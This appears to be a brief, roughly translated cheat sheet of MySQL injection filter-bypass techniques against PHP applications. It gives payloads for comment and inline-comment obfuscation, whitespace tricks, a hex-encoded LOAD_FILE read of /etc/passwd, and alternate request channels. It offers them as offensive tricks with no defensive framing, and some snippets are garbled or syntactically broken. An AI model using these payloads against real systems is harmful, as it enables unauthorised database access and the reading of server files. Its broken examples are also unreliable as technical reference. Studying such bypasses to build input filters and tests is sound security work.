Although the development of MySQL + PHP can be used in PDO, but some of the older programs are not used, or other reasons
1. Comment Bypass
Select/*comment*/user/*zzsdsdsf*/from Mysql.user;
2. Inline Comment Bypass
/*!12345select*//*!12345user*/from Mysql.user;
3. Special whitespace character bypass
\s will match 0x09,0x0a,0x0b,0x0c,0x0d,0x20 in PHP
But in MySQL, the whitespace character is 0x09,0x0a,0x0b,0x0c,0x0d,0x20,0xa0
0xa0 sometimes does wonders.
0x0a and 0x0d will affect "." And can be used sometimes.
4.16 Binary Bypass
Select Load_file (' 0x2f6574632f706173737764 ');
Python
>>> '/etc/passwd '. Encode (' hex ')
' 2f6574632f706173737764 '
5. Change a submission posture Bypass
Sometimes programmers only filter out the dangerous characters in Get, you can try post,cookies or even files
6.mysql Black Magic Bypass
Select{x user}from {x Mysql.user};
Some tricks of MySQL injection bypass